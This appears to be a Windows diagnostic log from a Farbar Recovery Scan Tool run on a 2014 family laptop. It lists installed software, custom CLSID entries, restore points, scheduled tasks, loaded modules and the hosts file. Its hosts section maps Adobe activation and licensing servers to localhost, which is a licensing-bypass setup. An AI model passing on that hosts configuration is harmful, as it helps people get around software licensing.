Update for Microsoft Office 2010 (KB2760631) 64-Bit Edition (HKLM\...\{91140000-003B-0000-1000-0000000FF1CE}_Office14.PRJPROR_{B6AD7E27-012A-4B63-82BA-AF62893E5435}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2794737) 64-Bit Edition (HKLM\...\{91140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUSR_{07DC9C6C-E916-4F42-8677-716930ED0393}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2794737) 64-Bit Edition (HKLM\...\{91140000-003B-0000-1000-0000000FF1CE}_Office14.PRJPROR_{07DC9C6C-E916-4F42-8677-716930ED0393}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2825635) 64-Bit Edition (HKLM\...\{91140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUSR_{6E760BBA-B83F-4C2D-918F-5F91EF6C9861}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2825640) 64-Bit Edition (HKLM\...\{90140000-0044-0407-1000-0000000FF1CE}_Office14.PROPLUSR_{43F59F4D-7179-497E-BE99-BC6F7D1DDCBA}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2825640) 64-Bit Edition (HKLM\...\{91140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUSR_{43F59F4D-7179-497E-BE99-BC6F7D1DDCBA}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2837581) 64-Bit Edition (HKLM\...\{91140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUSR_{D1F3B526-7EB2-4701-92DB-0784988D78DE}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2837581) 64-Bit Edition (HKLM\...\{91140000-003B-0000-1000-0000000FF1CE}_Office14.PRJPROR_{D1F3B526-7EB2-4701-92DB-0784988D78DE}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2837606) 64-Bit Edition (HKLM\...\{91140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUSR_{52BEF8AE-9324-40A1-9A92-E5A8FB63A475}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2878252) 64-Bit Edition (HKLM\...\{90140000-0043-0000-1000-0000000FF1CE}_Office14.PRJPROR_{56551B9F-2FE1-4705-ACF0-8FA920535E18}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2878252) 64-Bit Edition (HKLM\...\{90140000-0043-0000-1000-0000000FF1CE}_Office14.PROPLUSR_{56551B9F-2FE1-4705-ACF0-8FA920535E18}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2878252) 64-Bit Edition (HKLM\...\{91140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUSR_{56551B9F-2FE1-4705-ACF0-8FA920535E18}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2878252) 64-Bit Edition (HKLM\...\{91140000-003B-0000-1000-0000000FF1CE}_Office14.PRJPROR_{56551B9F-2FE1-4705-ACF0-8FA920535E18}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2881028) 64-Bit Edition (HKLM\...\{90140000-001F-0407-1000-0000000FF1CE}_Office14.PRJPROR_{8F699D53-05FB-488E-B7D3-E4E47257BE5D}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2881028) 64-Bit Edition (HKLM\...\{90140000-001F-0407-1000-0000000FF1CE}_Office14.PROPLUSR_{8F699D53-05FB-488E-B7D3-E4E47257BE5D}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2881028) 64-Bit Edition (HKLM\...\{90140000-001F-0409-1000-0000000FF1CE}_Office14.PRJPROR_{324703B5-6765-489D-9B9B-B082D34F882E}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2881028) 64-Bit Edition (HKLM\...\{90140000-001F-0409-1000-0000000FF1CE}_Office14.PROPLUSR_{324703B5-6765-489D-9B9B-B082D34F882E}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2881028) 64-Bit Edition (HKLM\...\{90140000-001F-040C-1000-0000000FF1CE}_Office14.PRJPROR_{4B9B2BAF-EE1F-4B60-A4D9-17B7BEEB13A1}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2881028) 64-Bit Edition (HKLM\...\{90140000-001F-040C-1000-0000000FF1CE}_Office14.PROPLUSR_{4B9B2BAF-EE1F-4B60-A4D9-17B7BEEB13A1}) (Version:  - Microsoft)
Update for Microsoft OneNote 2010 (KB2837595) 64-Bit Edition (HKLM\...\{90140000-0043-0000-1000-0000000FF1CE}_Office14.PRJPROR_{3029C408-1DD1-4273-8E58-87CB1B638FC8}) (Version:  - Microsoft)
Update for Microsoft OneNote 2010 (KB2837595) 64-Bit Edition (HKLM\...\{90140000-0043-0000-1000-0000000FF1CE}_Office14.PROPLUSR_{3029C408-1DD1-4273-8E58-87CB1B638FC8}) (Version:  - Microsoft)
Update for Microsoft OneNote 2010 (KB2837595) 64-Bit Edition (HKLM\...\{91140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUSR_{3029C408-1DD1-4273-8E58-87CB1B638FC8}) (Version:  - Microsoft)
Update for Microsoft Outlook 2010 (KB2687567) 64-Bit Edition (HKLM\...\{90140000-001A-0407-1000-0000000FF1CE}_Office14.PROPLUSR_{6164E0E5-C903-488C-93AF-1B7AF7EBC331}) (Version:  - Microsoft)
Update for Microsoft Outlook 2010 (KB2687567) 64-Bit Edition (HKLM\...\{91140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUSR_{DDDC32A5-9528-4771-B91A-97A8E1D7957B}) (Version:  - Microsoft)
Update for Microsoft PowerPoint 2010 (KB2837579) 64-Bit Edition (HKLM\...\{90140000-0018-0407-1000-0000000FF1CE}_Office14.PROPLUSR_{FD360122-6829-4497-97C1-1BF578EF695B}) (Version:  - Microsoft)
Update for Microsoft PowerPoint 2010 (KB2837579) 64-Bit Edition (HKLM\...\{91140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUSR_{A20A650C-F820-4CE4-AEA5-EC140192FAFB}) (Version:  - Microsoft)
Update for Microsoft SharePoint Workspace 2010 (KB2760601) 64-Bit Edition (HKLM\...\{90140000-0043-0000-1000-0000000FF1CE}_Office14.PRJPROR_{77374F16-2DC6-4EEF-AFAD-C59FDA2E010D}) (Version:  - Microsoft)
Update for Microsoft SharePoint Workspace 2010 (KB2760601) 64-Bit Edition (HKLM\...\{90140000-0043-0000-1000-0000000FF1CE}_Office14.PROPLUSR_{77374F16-2DC6-4EEF-AFAD-C59FDA2E010D}) (Version:  - Microsoft)
Update for Microsoft SharePoint Workspace 2010 (KB2760601) 64-Bit Edition (HKLM\...\{91140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUSR_{77374F16-2DC6-4EEF-AFAD-C59FDA2E010D}) (Version:  - Microsoft)
Update for Microsoft Visio 2010 (KB2880526) 64-Bit Edition (HKLM\...\{91140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUSR_{F6F342A1-530B-4D48-A468-1E3F70928984}) (Version:  - Microsoft)
Update for Microsoft Visio Viewer 2010 (KB2837587) 64-Bit Edition (HKLM\...\{91140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUSR_{C950A55F-82E3-4CC8-8FA2-E8A2A0F651F3}) (Version:  - Microsoft)
Update for Microsoft Word 2010 (KB2880529) 64-Bit Edition (HKLM\...\{91140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUSR_{89FDC8D9-FB84-4EFE-950D-AF4EECC3B64C}) (Version:  - Microsoft)
ViewNX 2 (HKLM-x32\...\{DDD62492-32A7-412B-8AF1-2CF032AD42E3}) (Version: 2.1.0 - Nikon)
Vinagame ZP Tu Lo Kho (Ta La) (HKLM-x32\...\Vinagame ZP Tu Lo Kho (Ta La)) (Version:  - )
Virtual Villagers 2 (HKLM-x32\...\Virtual Villagers 2_is1) (Version:  - FreeGamePick.com)
VLC media player 1.1.11 (HKLM-x32\...\VLC media player) (Version: 1.1.11 - VideoLAN)
VNPT-CA CL Token Manager V1 (HKLM-x32\...\ePass2002Auto-4FE7-A218-48BDAE051E2B_std100131216) (Version:  - EnterSafe)
Vodafone Mobile Connect Lite (HKLM-x32\...\{E3B99F3D-9856-482A-9048-305E28E2510C}) (Version: 9.4.2.14731 - Vodafone)
Welcome Center (HKLM-x32\...\Acer Welcome Center) (Version: 1.02.3002 - Acer Incorporated)
WIDCOMM Bluetooth Software (HKLM\...\{436E0B79-2CFB-4E5F-9380-E17C1B25D0C5}) (Version: 6.3.0.4300 - Broadcom Corporation)
Windows Live Communications Platform (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3508.0205 - Microsoft Corporation)
Windows Live Essentials (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live Family Safety (Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live Family Safety (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live ID Sign-in Assistant (Version: 7.250.4311.0 - Microsoft Corporation) Hidden
Windows Live Installer (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live Mail (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live Messenger (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live MIME IFilter (Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live Photo Common (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live PIMT Platform (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live SOXE (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live SOXE Definitions (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live Sync (HKLM-x32\...\{76618402-179D-4699-A66B-D351C59436BC}) (Version: 14.0.8089.726 - Microsoft Corporation)
Windows Live UX Platform (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live UX Platform Language Pack (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live Writer (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live Writer Resources (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
WinRAR 5.00 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.00.0 - win.rar GmbH)
WinRAR Password Cracker (HKLM-x32\...\{C6A96049-4BD0-465D-BF4D-66CBD0D0E3DD}) (Version: 3.1.0.0 - iWesoft)
XCOM: Enemy Within (HKLM-x32\...\WENPTUVuZW15V2l0aGlu_is1) (Version: 1 - )
Yahoo! Messenger (HKLM-x32\...\Yahoo! Messenger) (Version:  - Yahoo! Inc.)
Yahoo! Software Update (HKLM-x32\...\Yahoo! Software Update) (Version:  - )
Yahoo! Toolbar (HKLM-x32\...\Yahoo! Companion) (Version:  - Yahoo! Inc.)
YTD Video Downloader 4.3 (HKLM-x32\...\{1a413f37-ed88-4fec-9666-5c48dc4b7bb7}) (Version: 4.3 - GreenTree Applications SRL)
Zing Play (HKLM-x32\...\Zing Play) (Version: 3.0.106.8 - )
ZPTaLaAnDau (HKLM-x32\...\ZPTaLaAnDau) (Version:  - )
ZTE USB Driver (HKLM\...\ZTE USB Driver) (Version: 1.0.1.25_TME - ZTE Corporation)
 
==================== Custom CLSID (selected items): ==========================
 
(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)
 
CustomCLSID: HKU\S-1-5-21-4169419405-2626366916-160398126-1000_Classes\CLSID\{71748560-AA80-4469-9C1D-29A66233974C}\InprocServer32 -> C:\Users\Papa\AppData\Roaming\webnavi\nvi64.dll No File
CustomCLSID: HKU\S-1-5-21-4169419405-2626366916-160398126-1000_Classes\CLSID\{D66AFFF1-8FE8-48f0-A2D7-D231D926E751}\InprocServer32 -> C:\Users\Papa\AppData\Roaming\webnavi\nvi64.dll No File
CustomCLSID: HKU\S-1-5-21-4169419405-2626366916-160398126-1007_Classes\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}\InprocServer32 -> C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Local\Microsoft\SkyDrive\16.4.6013.0910\amd64\SkyDriveShell64.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-4169419405-2626366916-160398126-1007_Classes\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524}\InprocServer32 -> C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Local\Microsoft\SkyDrive\16.4.6013.0910\amd64\SkyDriveShell64.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-4169419405-2626366916-160398126-1007_Classes\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A}\InprocServer32 -> C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Local\Microsoft\SkyDrive\16.4.6013.0910\amd64\SkyDriveShell64.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-4169419405-2626366916-160398126-1007_Classes\CLSID\{F8071786-1FD0-4A66-81A1-3CBE29274458}\InprocServer32 -> C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Local\Microsoft\SkyDrive\16.4.6013.0910\amd64\FileSyncApi64.dll (Microsoft Corporation)
 
==================== Restore Points  =========================
 
30-06-2014 22:28:17 Windows Update
18-07-2014 13:01:08 Windows Update
26-07-2014 23:01:21 Windows Update
03-08-2014 10:33:53 Geplanter Prüfpunkt
03-08-2014 18:53:40 Windows Update
09-08-2014 18:13:52 Windows Update
12-08-2014 09:25:29 avast! antivirus system restore point
12-08-2014 09:30:19 Gerätetreiber-Paketinstallation: Avast Netzwerkdienst
 
==================== Hosts content: ==========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2014-04-02 22:36 - 2014-04-02 22:36 - 00000954 ____A C:\Windows\system32\Drivers\etc\hosts
127.0.0.1 activate.adobe.com
127.0.0.1 practivate.adobe.com
127.0.0.1 lmlicenses.wip4.adobe.com
127.0.0.1 lm.licenses.adobe.com
 
 
==================== Scheduled Tasks (whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)
 
Task: {002DFDBA-CA08-4B5C-9928-43147F96E817} - System32\Tasks\{1ED8EA91-DFCB-4126-8745-06E5E90A0E0E} => C:\Program Files (x86)\Yahoo!\Messenger\YahooMessenger.exe [2012-05-25] (Yahoo! Inc.)
Task: {0039F30C-749F-4539-AC6D-51FA8B6110E0} - System32\Tasks\{F6498D6E-56F6-4EDA-AE0B-A05EAC086407} => C:\Program Files (x86)\Yahoo!\Messenger\YahooMessenger.exe [2012-05-25] (Yahoo! Inc.)
Task: {0174B73F-DDEB-4AB5-871D-CA81AD7A301B} - System32\Tasks\{FEFD3BAB-D8EF-4232-B26C-88512C02F161} => C:\Users\PhanCo.FAMILIE-LE-NB\Desktop\BF2_EditorSetup_v1.3\BF2_EditorSetup_v1.3.exe
Task: {07332F5E-ED4D-4B2A-AE14-4571172E64DE} - System32\Tasks\{D450941B-0D13-4C9F-9211-9CB2D30CD9BE} => C:\Program Files (x86)\EA GAMES\Battlefield 2\BF2Editor.exe [2006-05-15] (Digital Illusions CE AB)
Task: {168E0202-9636-4D94-B234-DA1EE290C4CD} - System32\Tasks\{345E766D-20F2-4095-B19A-5275B3BA7F5B} => C:\Program Files (x86)\Yahoo!\Messenger\YahooMessenger.exe [2012-05-25] (Yahoo! Inc.)
Task: {1D4497B2-95C3-449F-8666-AEBAB81A1CC4} - System32\Tasks\{645C8593-CEF7-4F83-B6E9-27E3B823E73F} => C:\Users\PhanCo.FAMILIE-LE-NB\Desktop\BF2_EditorSetup_v1.3\BF2_EditorSetup_v1.3.exe
Task: {2D262205-9E36-404B-84B6-5483186B48A5} - System32\Tasks\{F522BCE3-8FE5-415C-AA87-260EB3449DBF} => C:\Program Files (x86)\Macromedia\Flash 8\Flash.exe [2005-08-31] (Macromedia, Inc.)
Task: {2E2466B6-6AA4-4164-B260-D78E3CA91F17} - System32\Tasks\{6F845129-D911-4AFE-A1E1-7EEF2BDC178F} => C:\Users\PhanCo.FAMILIE-LE-NB\Desktop\BF2_EditorSetup_v1.3.exe
Task: {3CF562CC-50FE-468A-82A6-BF1D27038B0C} - System32\Tasks\Start Registry Reviver for FAMILIE-LE-NB@PhanCo(logon) => C:\Program Files\ReviverSoft\Registry Reviver\RegistryReviver.exe
Task: {3D2DAE11-127B-48E7-8701-51682BAA8DF3} - System32\Tasks\{97073CF9-72E4-4582-94D5-0C25978710EE} => C:\Program Files (x86)\EA GAMES\Battlefield 2\BF2Editor.exe [2006-05-15] (Digital Illusions CE AB)
Task: {5865B49E-AC2A-4699-BA0A-A6701E4EB11A} - System32\Tasks\{2D71BAD1-6910-4B10-80BF-E8C4B821371E} => C:\Program Files (x86)\Macromedia\Flash 8\Flash.exe [2005-08-31] (Macromedia, Inc.)
Task: {589D657D-AE7F-4300-A185-FFE8E5CA232B} - System32\Tasks\{4E20B463-DADE-4CEC-A9D2-9E304BCF1B06} => C:\Program Files (x86)\EA GAMES\Battlefield 2\BF2_r.exe [2006-05-04] ()
Task: {5EC27903-7396-4F51-9186-C7AE53D663F9} - System32\Tasks\{60806E6A-01A7-4414-85B9-CAC41EEECD9E} => C:\Program Files (x86)\EA GAMES\Battlefield 2\BF2Editor.exe [2006-05-15] (Digital Illusions CE AB)
Task: {6A8B2BD3-6DBA-4EE7-A192-6C109A89902A} - System32\Tasks\{0D49F02F-BCC2-41BD-8E01-8D9293E07387} => C:\Users\PhanCo.FAMILIE-LE-NB\Desktop\BF2_EditorSetup_v1.3\BF2_EditorSetup_v1.3.exe
Task: {6AE0B28B-FFDA-4DEC-9921-376E3D5F7A3E} - System32\Tasks\{5163E2A9-C491-49AE-9F29-3C871BE9779B} => C:\Program Files (x86)\Macromedia\Flash 8\Flash.exe [2005-08-31] (Macromedia, Inc.)
Task: {70F134F5-EDBB-48C8-AD63-7D67287B8F61} - System32\Tasks\{F60421AB-250F-47BE-8660-DFB81D951413} => C:\Program Files (x86)\EA GAMES\Battlefield 2\BF2Editor.exe [2006-05-15] (Digital Illusions CE AB)
Task: {74F9557D-5D27-4135-9255-5623024EAA25} - System32\Tasks\{A0B70D75-45C5-458A-BDED-9D4F0AB53022} => C:\Program Files (x86)\AsiasoftVN\TheGioiBaVuong\BaVuong2\ga2.exe
Task: {790234E9-2571-4CCF-8470-C21783CEFE4B} - System32\Tasks\{F5D1686F-FB4D-42C1-83B8-404F640CADF1} => C:\Program Files (x86)\Yahoo!\Messenger\YahooMessenger.exe [2012-05-25] (Yahoo! Inc.)
Task: {7B4F85AE-EA59-4BEC-B189-4543AA6A826E} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {869B6B82-046E-4C6A-8BAC-0915A0099D7E} - System32\Tasks\CocCocUpdateTaskUserS-1-5-21-4169419405-2626366916-160398126-1007UA => C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Local\CocCoc\Update\CocCocUpdate.exe [2014-01-20] (Itim Technologies Co., Ltd.)
Task: {91756579-2FCB-4690-8BEE-848D9C5F29E7} - System32\Tasks\HPCustParticipation HP Photosmart 6510 series => C:\Program Files\HP\HP Photosmart 6510 series\Bin\HPCustPartic.exe [2011-05-25] (Hewlett-Packard Co.)
Task: {9502FF07-AC6C-4D2F-8549-D05D11949ABC} - System32\Tasks\Telerik Control Panel Notifier FAMILIE-LE-NB_Papa => TelerikControlPanelNotifier.exe
Task: {99258B7B-2C6A-490F-824C-2C56D3D658A9} - System32\Tasks\{B78CBE6B-43C7-467D-8ECC-0BA2A7FAAC3F} => C:\Program Files (x86)\Macromedia\Flash 8\Flash.exe [2005-08-31] (Macromedia, Inc.)
Task: {A592CD30-577C-4215-B3C3-1C6EAE49C167} - System32\Tasks\{89ECCF29-090E-4CA0-905C-860432B622B1} => C:\Program Files (x86)\Yahoo!\Messenger\YahooMessenger.exe [2012-05-25] (Yahoo! Inc.)
Task: {B730D49D-C36E-4831-94CD-D9F6D1935BBB} - System32\Tasks\{3AACD023-7722-4ED7-AB7F-9BD4F2FA51FD} => C:\Program Files (x86)\The Sir. Community\BattleDirector\BattleDirector.exe
Task: {BBD9947F-9762-4E33-BA5D-B36C38D75E14} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2010-11-16] (Google Inc.)
Task: {BBF560C9-2C10-4B5A-A17E-5770A2C8B313} - System32\Tasks\{593BBC14-B748-4EDA-BD4A-95368FC41E6F} => C:\Program Files (x86)\The Sir. Community\BattleDirector\BattleDirector.exe
Task: {C4175321-C341-44EF-B15C-A3CC9FD577BE} - System32\Tasks\{C6EFE039-88BD-44F2-8C90-6F57CAC3B61C} => C:\Program Files (x86)\Macromedia\Flash 8\Flash.exe [2005-08-31] (Macromedia, Inc.)
Task: {C435DDAC-5331-45BA-9C21-18BB4B850159} - System32\Tasks\{2CDC2B10-FF27-4E91-B3C5-7D8005FD63DF} => C:\Program Files (x86)\Macromedia\Flash 8\Flash.exe [2005-08-31] (Macromedia, Inc.)
Task: {CA93F0B4-8B1F-45AA-BDE5-F49E9DDE8E91} - System32\Tasks\{D7218A5D-2E81-4946-9E96-9F8B93254E4D} => C:\Program Files (x86)\PlayPark\QuyenVuong\ga2.exe [2010-01-14] ()
Task: {DAB6F2CF-9151-4FCC-B498-E37A2C97F2AF} - System32\Tasks\avast! Emergency Update => C:\Program Files\Alwil Software\Avast5\AvastEmUpdate.exe [2014-08-12] (AVAST Software)
Task: {DC06A566-78A8-41ED-BBD7-CFBA5F467A6F} - System32\Tasks\{3E8EFA57-7A4F-48BE-885B-3E49358CBC14} => C:\Program Files (x86)\Macromedia\Flash 8\Flash.exe [2005-08-31] (Macromedia, Inc.)
Task: {DC0F13C8-13F1-49C9-8D43-CB1E83D76ADF} - System32\Tasks\{387A92AC-BF34-4248-8AB4-3C310797847D} => C:\Program Files (x86)\Yahoo!\Messenger\YahooMessenger.exe [2012-05-25] (Yahoo! Inc.)
Task: {E8052F49-2133-45FF-AE28-0B8BA15F7902} - System32\Tasks\HP Photo Creations Messager => C:\ProgramData\HP Photo Creations\MessageCheck.exe [2011-02-15] ()
Task: {EB8C6B0F-3D19-4440-8822-4D23664326B1} - System32\Tasks\{D72C7B5E-6957-4E3A-8BF8-9ED773DF1A14} => Chrome.exe http://ui.skype.com/...e=tsProgressBar
Task: {EF2D26AC-0965-44A0-9CE7-4842D2F2E586} - System32\Tasks\CocCocUpdateTaskUserS-1-5-21-4169419405-2626366916-160398126-1007Core => C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Local\CocCoc\Update\CocCocUpdate.exe [2014-01-20] (Itim Technologies Co., Ltd.)
Task: {EFDF17FB-1C37-492E-9AA6-EB10EF0499E8} - System32\Tasks\{43CEBE49-F60A-4FCC-AD63-0294344797D7} => C:\Users\PhanCo.FAMILIE-LE-NB\Desktop\BF2_EditorSetup_v1.3.exe
Task: {F12BE396-F510-4003-BA05-8F0E8F0D34B1} - System32\Tasks\{78175C85-8141-4DD1-A2D5-DEF3FAAB6215} => C:\Program Files (x86)\AsiasoftVN\TheGioiBaVuong\BaVuong2\ga2.exe
Task: {F7289060-1A3E-422B-85DD-66A506B7A966} - System32\Tasks\{0E90ABFC-6C49-4640-9D84-3DD59B942607} => C:\Program Files (x86)\Yahoo!\Messenger\YahooMessenger.exe [2012-05-25] (Yahoo! Inc.)
Task: {F7DB6933-9CC7-4315-BCCF-7AB8E2F5F7F0} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2010-11-16] (Google Inc.)
Task: C:\Windows\Tasks\CocCocUpdateTaskUserS-1-5-21-4169419405-2626366916-160398126-1007Core.job => C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Local\CocCoc\Update\CocCocUpdate.exe
Task: C:\Windows\Tasks\CocCocUpdateTaskUserS-1-5-21-4169419405-2626366916-160398126-1007UA.job => C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Local\CocCoc\Update\CocCocUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\HP Photo Creations Messager.job => C:\ProgramData\HP Photo Creations\MessageCheck.exe
Task: C:\Windows\Tasks\Start Registry Reviver for FAMILIE-LE-NB@PhanCo(logon).job => C:\Program Files\ReviverSoft\Registry Reviver\RegistryReviver.exe
 
==================== Loaded Modules (whitelisted) =============
 
2014-06-25 11:01 - 2013-10-17 22:32 - 00020472 _____ () C:\Windows\system32\spool\PRTPROCS\x64\TeamViewer_PrintProcessor.dll
2013-09-05 00:17 - 2013-09-05 00:17 - 04300456 _____ () C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cultures\OFFICE.ODF
2014-08-12 16:29 - 2014-08-12 16:29 - 00301152 _____ () C:\Program Files\Alwil Software\Avast5\aswProperty.dll
2014-08-12 16:23 - 2014-08-12 16:23 - 02786304 _____ () C:\Program Files\Alwil Software\Avast5\defs\14081200\algo.dll
2012-10-22 16:55 - 2012-10-22 16:55 - 01113600 _____ () C:\Program Files\Samsung\AllShare Framework DMS\1.3.06\DMSManager.dll
2012-10-05 17:27 - 2012-10-05 17:27 - 00704000 _____ () C:\Program Files\Samsung\AllShare Framework DMS\1.3.06\ContentDirectoryPresenter.dll
2012-08-21 19:06 - 2012-08-21 19:06 - 00107008 _____ () C:\Program Files\Samsung\AllShare Framework DMS\1.3.06\DCMCDP.dll
2012-08-21 19:06 - 2012-08-21 19:06 - 00101376 _____ () C:\Program Files\Samsung\AllShare Framework DMS\1.3.06\FolderCDP.dll
2012-08-14 11:42 - 2012-08-14 11:42 - 00077312 _____ () C:\Program Files\Samsung\AllShare Framework DMS\1.3.06\MetadataFramework.dll
2012-08-14 11:13 - 2012-08-14 11:13 - 00520234 _____ () C:\Program Files\Samsung\AllShare Framework DMS\1.3.06\sqlite3.dll
2012-08-14 11:13 - 2012-08-14 11:13 - 00450560 _____ () C:\Program Files\Samsung\AllShare Framework DMS\1.3.06\MoodExtractor.dll
2012-08-14 11:43 - 2012-08-14 11:43 - 05717504 _____ () C:\Program Files\Samsung\AllShare Framework DMS\1.3.06\DCMImgExtractor.dll
2012-08-14 11:42 - 2012-08-14 11:42 - 00028672 _____ () C:\Program Files\Samsung\AllShare Framework DMS\1.3.06\AutoChaptering.dll
2012-08-14 11:42 - 2012-08-14 11:42 - 00147456 _____ () C:\Program Files\Samsung\AllShare Framework DMS\1.3.06\libexpat.dll
2012-08-14 11:42 - 2012-08-14 11:42 - 00012288 _____ () C:\Program Files\Samsung\AllShare Framework DMS\1.3.06\VideoThumb.dll
2012-08-14 11:43 - 2012-08-14 11:43 - 04671488 _____ () C:\Program Files\Samsung\AllShare Framework DMS\1.3.06\avcodec-52.dll
2012-08-14 11:42 - 2012-08-14 11:42 - 00070656 _____ () C:\Program Files\Samsung\AllShare Framework DMS\1.3.06\avutil-50.dll
2012-08-14 11:42 - 2012-08-14 11:42 - 00686080 _____ () C:\Program Files\Samsung\AllShare Framework DMS\1.3.06\avformat-52.dll
2012-08-14 11:43 - 2012-08-14 11:43 - 00152064 _____ () C:\Program Files\Samsung\AllShare Framework DMS\1.3.06\swscale-0.dll
2012-08-14 11:42 - 2012-08-14 11:42 - 00028160 _____ () C:\Program Files\Samsung\AllShare Framework DMS\1.3.06\AudioExtractor.dll
2012-08-14 11:42 - 2012-08-14 11:42 - 00063488 _____ () C:\Program Files\Samsung\AllShare Framework DMS\1.3.06\ID3Driver.dll
2012-08-14 11:42 - 2012-08-14 11:42 - 00366592 _____ () C:\Program Files\Samsung\AllShare Framework DMS\1.3.06\tag.dll
2012-08-14 11:42 - 2012-08-14 11:42 - 00289792 _____ () C:\Program Files\Samsung\AllShare Framework DMS\1.3.06\libThumbnail.dll
2012-08-14 11:42 - 2012-08-14 11:42 - 00023040 _____ () C:\Program Files\Samsung\AllShare Framework DMS\1.3.06\RichInfoDriver.dll
2012-08-14 11:42 - 2012-08-14 11:42 - 00017920 _____ () C:\Program Files\Samsung\AllShare Framework DMS\1.3.06\VideoExtractor.dll
2012-10-22 16:55 - 2012-10-22 16:55 - 00117248 _____ () C:\Program Files\Samsung\AllShare Framework DMS\1.3.06\ThumbnailMaker.dll
2012-10-22 16:55 - 2012-10-22 16:55 - 01033216 _____ () C:\Program Files\Samsung\AllShare Framework DMS\1.3.06\ImageMagickWrapper.dll
2012-08-14 11:42 - 2012-08-14 11:42 - 00133120 _____ () C:\Program Files\Samsung\AllShare Framework DMS\1.3.06\VideoMetadataDriver.dll
2012-08-14 11:42 - 2012-08-14 11:42 - 00290816 _____ () C:\Program Files\Samsung\AllShare Framework DMS\1.3.06\libKeyFrame.dll
2012-08-14 11:42 - 2012-08-14 11:42 - 00024064 _____ () C:\Program Files\Samsung\AllShare Framework DMS\1.3.06\SECMetaDriver.dll
2012-08-14 11:42 - 2012-08-14 11:42 - 00012288 _____ () C:\Program Files\Samsung\AllShare Framework DMS\1.3.06\ImageExtractor.dll
2012-08-14 11:42 - 2012-08-14 11:42 - 00024064 _____ () C:\Program Files\Samsung\AllShare Framework DMS\1.3.06\photoDriver.dll
2012-08-14 11:43 - 2012-08-14 11:43 - 00399826 _____ () C:\Program Files\Samsung\AllShare Framework DMS\1.3.06\libexif-12.dll.dll
